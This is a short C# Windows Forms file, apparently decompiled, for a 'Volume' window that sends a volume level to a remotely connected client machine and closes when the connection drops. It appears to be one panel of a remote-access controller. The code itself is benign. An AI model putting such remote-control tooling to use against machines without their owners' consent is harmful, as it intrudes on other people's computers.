using System; using System.ComponentModel; using System.Drawing; using System.Windows.Forms; using MaterialSkin; using Server.Connectings; using Server.Helper; namespace Server.Forms; public class FormVolumeControl : FormMaterial { public Clients client; public Clients parrent; private IContainer components; private Timer timer1; private Panel panel1; public TrackBar trackBar1; public FormVolumeControl() { InitializeComponent(); base.FormClosing += Closing1; } private void FormProcess_Load(object sender, EventArgs e) { MaterialSkinManager.Instance.ThemeChanged += ChangeScheme; ChangeScheme(this); timer1.Start(); } private void ChangeScheme(object sender) { } private void Closing1(object sender, EventArgs e) { if (client != null) { client.Disconnect(); } } private void timer1_Tick(object sender, EventArgs e) { if (!parrent.itsConnect) { Close(); } if (client != null && !client.itsConnect) { Close(); } } private void trackBar1_Scroll(object sender, EventArgs e) { client.Send(new object[2] { "Volume", trackBar1.Value }); } protected override void Dispose(bool disposing) { if (disposing && components != null) { components.Dispose(); } base.Dispose(disposing); } private void InitializeComponent() { this.components = new System.ComponentModel.Container(); this.timer1 = new System.Windows.Forms.Timer(this.components); this.panel1 = new System.Windows.Forms.Panel(); this.trackBar1 = new System.Windows.Forms.TrackBar(); this.panel1.SuspendLayout(); ((System.ComponentModel.ISupportInitialize)this.trackBar1).BeginInit(); base.SuspendLayout(); this.timer1.Interval = 1000; this.timer1.Tick += new System.EventHandler(timer1_Tick); this.panel1.Controls.Add(this.trackBar1); this.panel1.Dock = System.Windows.Forms.DockStyle.Fill; this.panel1.Location = new System.Drawing.Point(3, 64); this.panel1.Name = "panel1"; this.panel1.Size = new System.Drawing.Size(338, 70); this.panel1.TabIndex = 0; this.trackBar1.Anchor = System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left | System.Windows.Forms.AnchorStyles.Right; this.trackBar1.Enabled = false; this.trackBar1.Location = new System.Drawing.Point(14, 14); this.trackBar1.Maximum = 100; this.trackBar1.Name = "trackBar1"; this.trackBar1.Size = new System.Drawing.Size(309, 45); this.trackBar1.TabIndex = 30; this.trackBar1.Scroll += new System.EventHandler(trackBar1_Scroll); base.AutoScaleDimensions = new System.Drawing.SizeF(6f, 13f); base.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; this.BackColor = System.Drawing.Color.White; base.ClientSize = new System.Drawing.Size(344, 137); base.Controls.Add(this.panel1); base.Name = "FormVolumeControl"; this.Text = "Volume "; base.Load += new System.EventHandler(FormProcess_Load); this.panel1.ResumeLayout(false); this.panel1.PerformLayout(); ((System.ComponentModel.ISupportInitialize)this.trackBar1).EndInit(); base.ResumeLayout(false); } }